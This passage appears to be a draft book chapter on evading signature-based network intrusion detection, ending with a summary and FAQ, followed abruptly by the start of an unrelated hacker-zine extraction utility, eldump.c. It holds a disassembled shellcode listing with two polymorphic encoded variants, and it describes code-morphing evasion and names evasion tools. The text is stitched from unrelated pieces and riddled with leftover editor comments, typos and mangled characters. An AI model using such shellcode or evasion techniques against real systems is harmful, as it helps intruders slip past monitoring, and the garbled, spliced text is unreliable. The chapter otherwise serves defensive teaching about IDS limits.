3+1, 6-2 and so on. There are literally endless methods to calculate a given value—this is the job of an exploit, the possessing of some machine instructions. To a NIDS examining network traffic there is no way to identify 2+2 being equivalent to 3+1. The NIDS is only given the low-level machine instructions to evaluate against a known pattern; it does not interpret the instructions as the target host will. This technique has the ability to mask any exploit from detection, from any specific rule to the general. The only opportunity for a signature based NIDS to formulate a match is if a signature for the small decoder is able to be determined. To date I have not seen any signatures or techniques developed for this class of polymorphic shellcode. Table 16.1 shows a side by side view of two executions of a polymorphic shellcode engine. What should alignment of multiple items within table columns be? Table 16.1 Insert Title HereShellcode Variations Addresses Normal Shellcode Possible Polymorphic shellcode #1 Possible Polymorphic shellcode #2  0x8049b00 0x8049b01 0x8049b02 0x8049b03 0x8049b04 0x8049b05 0x8049b06 0x8049b07 0x8049b08 0x8049b09 0x8049b0a 0x8049b0b 0x8049b0c 0x8049b0d 0x8049b0e 0x8049b0f 0x8049b10 0x8049b11 0x8049b12 0x8049b13 0x8049b14 0x8049b16 0x8049b17 0x8049b19 0x8049b1b 0x8049b1e 0x8049b20 0x8049b21 0x8049b23 0x8049b25 0x8049b26 0x8049b28 0x8049b2a 0x8049b2b 0x8049b2d 0x8049b2f 0x8049b31 0x8049b33 0x8049b35 0x8049b36 nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop jmp 0x8049b38 pop %esi mov %esi,%ebx mov %esi,%edi add $0x7,%edi xor %eax,%eax stos %al,%es:(%edi) mov %edi,%ecx mov %esi,%eax stos %eax,%es:(%edi) mov %edi,%edx xor %eax,%eax stos %eax,%es:(%edi) mov $0x8,%al add $0x3,%al int $0x80 xor %ebx,%ebx mov %ebx,%eax inc %eax int $0x80 push %ebx cmc pop %edx xchg %eax,%edx lahf aas push %esi push %esp clc push %edx push %esi xchg %eax,%ebx dec %ebp pop %ecx inc %edi dec %edi inc %ecx sahf pop %edi sti push %esp repz dec %eax push %ebp dec %esp pop %eax loope 0x804da1b js 0x804d994 daa sbb $0x15,%al pop %eax out %eax,(%dx) push %ebp dec %edi jp 0x804d966 movl %es:(%ecx),%ss mov $0x15d5b76c,%ebp adc %edi,(%edi) loopne 0x804d9a0 push %ebp xchg %eax,%ecx das pushf inc %ecx xchg %eax,%ebp pop %edi push %edi dec %ebp dec %ebx lahf xchg %eax,%edx push %ebx pushf inc %esp fwait lahf pop %edi dec %ecx dec %eax cwtl dec %esp xchg %eax,%ebx sarb $0x45,(%ecx) mov 0xffffff90(%ebx),%ebp dec %edi mov $0xd20c56e5,%edi imul $0x36,0xee498845(%esi),%ebx dec %ecx and %ah,%cl jl 0x804da3d out %al,$0x64 add %edi,%eax sarl %cl,0x4caaa2a0(%ebp,%eax,2) nop cmp 0x5cd8733(%eax),%ebx movsl %ds:(%esi),%es:(%edi) push %ss int $0x14 push $0xbffff586 xchg %dh,%ch (bad)   As you can plainly see, there is very little correlation between the three executions. There are very many possibilities There are a huge number of permutations that can be used. Unfinished thought? What’s the (bad) there? That is part of the encoded shellcode, it’s value did not decode by gdb as a valid instruction so it just pop’s up as ?bad)? Countermeasure It is apparent that most IDSs are not always quite ready to run out of the box. They require frequent updating and maintenance to yield long-term success. Some The IDSs that do have hope of detecting unknown forms of attack are anomaly detection based. These systems do not use signatures at all. They instead monitor all network communications as they occur and attempt to build a high level image of typical traffic. A statistical anomaly would then trigger an alert. As the system matures and gains more entropy into its database, it would then theoretically become more accurate. There is some question whether or not a purely anomaly-based detection engine would be very effective, as exploit attempts seem to be quite normal in day-to-day network operation and may fall into the baseline of these systems. As in all things, a little of each is not a bad idea. A strong signature based system supplemented by an anomaly based detection engine should yield a high level of assurance that most intrusion events are monitored. In the endless security game of cat and mouse, one can forecast the generation of polymorphic statistically normalized attack engines that should provide one more hurdle for NIDS developers to overcome. Summary Signature based IDS sensors have many variables to account for when attempting to analyze and interpret network data. Many challenges continue to elude these systems. The lack of information that is available for inspection is difficult to overcome. However, the rate at which many IDS sensors have been maturing is quite promising; Gigabit speeds and flexible architectures supported by an ever growing security community push forward to achieve configure systems that are capable of detecting all but the most obtuse and infrequent attack scenarios. At every layer of the network stack there are difficulties with maintaining a consistent view of network traffic and the effect of every packet being transmitted. It is quite clear that an attacker has certain advantages, being able to hide in a sea of information while being the only one aware of their true intension. Packet layer evasions have been well documented throughout the past several years. IDS vendors are quite aware of the many issues surrounding packet acquisition and analysis. Most networks are beginning to filter “suspicious?packets in any case, that is any types with options and excessive fragmentations. Perhaps in the coming years network layer normalizations will become commonplace and many of these evasion possibilities will evaporate. The difficulty with analyzing the application layer protocols continues to cause ongoing headaches. Some proxy solutions have begun to take hold but the bottleneck that these systems cause is often too great. They also suffer from similar issues as IDSs, unable to identify classes of attacks that they were not originally intended for. It is simple quite acceptable to quash malformed TCP/IP packets in the case of an error; the a legitimate end system will would eventuallysimply retransmit. The same is not true for higher layers; a NIDS may have an extremely limited understanding of application protocols and the information they transmit. Polymorphic attacks present a significant challenge that cannot be easily solved with a purely signature based system. These attacks may exist in virtually limitless combinations. Fix grammar IDS evasion will continue to be a way of life on the Internet. There will beis an ever-flowing renewing tide of tools and techniques that are developed and refined designed for large-scale implementation (eventually raising the everyday script kitty kiddie into a previously reserved more advanced skill set) to make the job of detection more difficult.. One should continually monitor and investigate network activity to gain an understanding of what to expect on day-to-day operations. hold dear the principles of least privilege, segmentation and auditing to ensure their overall network posturing remains as secure as possible. Clarify? Solutions Fast Track Author: Please fortify these bullet points so they are all full sentences. They should also be a bit more informative and useful to the reader who wants to use them to brush up on the chapter material—you could add a sentence to each that makes it clearer why that particular point is relevant to the chapter. Understanding How Signature-Based IDSs Work Capabilities defined in signature database The capabilities of a NIDS are defined by a signature database. This enforces the requirement for frequent updates to combat the frequency of new vulnerabilities. Difficult to extrapolate from defined database Most NIDS do not alert even to slight variations of the defined signatures. This affords an attacker the ability too vary there attack to evade a signature match. Signatures are very specific to a vulnerability slight variations will be missed Increase the processing overhead required for detection Attackers will continue to vary there evasion techniques such that the processing required to monitor and detect is greatly increased. This would contribute to DoS and evasion possibilities. Using Packet Level Evasion Many vendors implement TCP/IP with slight variations. A NIDS has a difficult time in constructing a view of network communications as they appear to other systems. This inconsistent view is what allows an attacker to evade detection. Hosts may not adhere to RFC specifications and allow some packets where the NIDS would may not. drop NIDS do not have enough information from the wire to reconstruct TCP/IP communications. With the options and states available in a TCP/IP stack, some ambiguities form as to how a host would interpret information, there is an insufficiently of information transmitted between systems when communicating. Fragrouter and congestant are effective evasion tools. They implement a number of documented NIDS evasion techniques. Using Protocol and Application Protocol Level Evasion Application protocols are difficult to interpret Application protocols are verbose and rich in function. There are many subtle, antiquated and obscure application nuances that make effective application protocol decoding difficult. An attacker may compromise even the slightest oversight. Applications tend to allow for slight variation, developers intentionally build in error correcting cases that attempt to make sense of any request, no matter how malformed. With a lax of strict compliance to defined specifications, it is difficult for the NIDS to determine the behavior of a network application. Multiple encoding options exist for data representation, Unicode, uuencoded or hex encoded options exist in many application protocols. These alternate representations complicate the development of detection engines. Using Code Morphing Evasion There is always more then one way to do it. When detection hinges on the identification of application code, there are many alternatives to code generation. Code may be randomly generated The code of an attack may be pseudo randomly generated. Any number of instructions can accomplish similar tasks, the code must simply function there is no requirement of performance or other optimization benefits. Most exploits will vary from host to host. Variations can be incorporated even when restrictions are placed on the length or type of codes possible. Frequently Asked Questions Q: How many IDSs do I need to make them more effective? A: All networks are different and require varying levels of monitoring. Your particular risk tolerance should help you find this out though. A network witch desired a high level of assurance that they are detecting many intrusion events, should have at least one sensor per network segment (layer 2). It is also desirable to have multiple vendor types implemented when an even hirer higher level of security is needed (one vendor’s strengths would hopefully fill in gaps from another) Q: Aren’t these techniques too advanced for most attackers? A: Just like most other technologies, attack methodologies and techniques are eventually turned into boilerplate applications that anybody can wield. The layout of the virtual battlefield may change in an instant. The next big worm might wield these techniques, and force a sea-change in the IDS market. Q: How do I choose the best IDS? A: Continue to do as much research as possible. The biggest tool that a network architect has is that only they are aware of all the tricks that are deployed on the enterprise. Be creative, use multiple vendors?technologies, and implement honeypots for advanced warning of unknown techniques and vulnerabilities. Homegrown technologies (if properly tested and implemented) often do a great service when a high degree of security is required. Q: Where can I get information about new evasion attacks? A: The “underground?scene is typically the catalyst for advancements in security technologies. Frequent online publications, get a feel for where useful information may come from. There is no single source for where all new papers will be distributed. Check out: antisec (http://anti.security.is) Phrack (http://) Packetstorm () Technotronic (http://www.technotronic.com/) Drop a couple of names, if you would if you like Phrack, some mailing list, etc please mention here. Q: What do I do if I am inundated with alerts? A: Secure systems rely on compartmentalization to hopefully contain intruders. If you see that you are being attacked at an abnormal pace, isolate and separate the troubled systems and attempt to identify if there are some hosts with some well-known vulnerabilities or exposures. Correlate your logs and IDS events to give you a better picture of what may be going on. Do not rely on authorities and the network administrators of the attacking networks; they are usually far too overworked or uninterested to give a respectable amount of support. Q: How do I know that my IDSs are working? A: Ongoing auditing and testing should be done to ensure that networking systems are properly implemented. Independent reviewers should always be apart of secure systems to ensure a fresh set of eyes evaluate a network architecture and IDS implementation. [END_CUT] ch16 [END_DIR] articles .~e~----------------------------------------------------------~e~. ; *16* ELDUMP & ELTAG ~el8 ez1ne t00lz -- s1rsyko ; `----------------------------------------------------------------' [BEGIN_DIR] . [CUT_HERE] eldump.c /* -+-+ cat <<'/*++--++*'> eldump.c # */ /********************************************** * released under (E) licensing ... * * (E) RULES AND REGULATIONS * **********************************************/ /******************************************* * eldump.c for standard UNIX compilers * * next version: * * * * +article extraction (ablility to *(E)* * specify article number) *[~]* * +code extract by article number *[E]* * +GUI interface for file viewing *[L]* * (most likely curses based) *[8]* * +ability to update code/articles via *[`]* * updates/correction posted *[9]* * on ~el8 website *[9]* * +much cooler/faster/stronger/portable * * +Versions for DOS C/COBOL/Asm/Pascal * *******************************************/ #include #include #include #include #include #include #include #include /************************************** * next version of eldump will have * * a lot more features, this is just * * a basic code extraction version. * * - team ~el8 * * * * #define ISH_START "[SOI] %s" * * #define ARTICLE_START "[BOW] %s" * * #define ARTICLE_END "[EOW]" * * #define ISH_END "[EOI]" * **************************************/ /* for verbosity */ #define VERBOSE 0x01 #define VERY 0x10 #define LOTS 0x20 /* char array sizes */ #define LINELEN 80 #define BUFLEN 255 /* Issue Tag Defines */ #define CODE_START "[CUT_HERE] %s" #define CODE_START_ARGS 1 #define DIR_START "[BEGIN_DIR] %s" #define DIR_START_ARGS 1 #define DIR_END "[END_DIR] %s" #define DIR_END_ARGS 1 #define CODE_END "[END_CUT] %s" #define CODE_END_ARGS 1 #define loop(n) for(;n;) /* global vars */ FILE *TextFD; char BaseDirectory[BUFLEN], buf[LINELEN], CodeDir[BUFLEN + BUFLEN], tmp[LINELEN]; int verbose = 0, linez = 0, codez = 0, dirz = 0; const char *license = \ "/***********************************************\n" " * released under (E) licensing ... *\n" " ***********************************************/\n" "/* contact ahuger@securityfocus.com for full license */\n" "/* code copyrighted by ~el8 -- don't infringe! */\n\n"; /********************** * int article(char *); * int issue(char *); **********************/ /* function prototypes */ int code (char *); int extr (char *); int main (int argc, char *argv[]) { int NumberOfFiles; // For multiple files getcwd (BaseDirectory, BUFLEN); // error checking is for pussiez setvbuf (stderr, (char *) NULL, _IONBF, 0); if (argc < 2) // no options specified { fprintf (stderr, "\033[0;36m" ".---------------------------------------.\n" "|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n" "|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n" "|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n" "|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n" "|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n" "`---usage-------------------------------'\n" "\033[m\n" "\033[7m %s [file1 file2 file3 ...]